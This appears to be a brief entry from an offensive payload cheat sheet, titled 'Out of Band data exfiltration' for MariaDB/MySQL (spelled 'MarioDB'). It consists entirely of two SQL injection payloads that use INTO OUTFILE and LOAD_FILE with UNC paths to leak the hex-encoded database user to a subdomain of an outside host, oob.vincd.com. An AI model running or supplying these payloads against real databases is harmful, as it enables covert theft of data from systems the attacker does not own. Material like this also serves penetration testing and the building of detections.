MarioDB / MySQL

Out of Band data exfiltration

SELECT 'a' INTO OUTFILE CONCAT('\\\\', (SELECT HEX(CONCAT(user(), "\n"))), '.oob.vincd.com\\test.txt');
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(), "\n"))), '.oob.vincd.com\\test.txt'));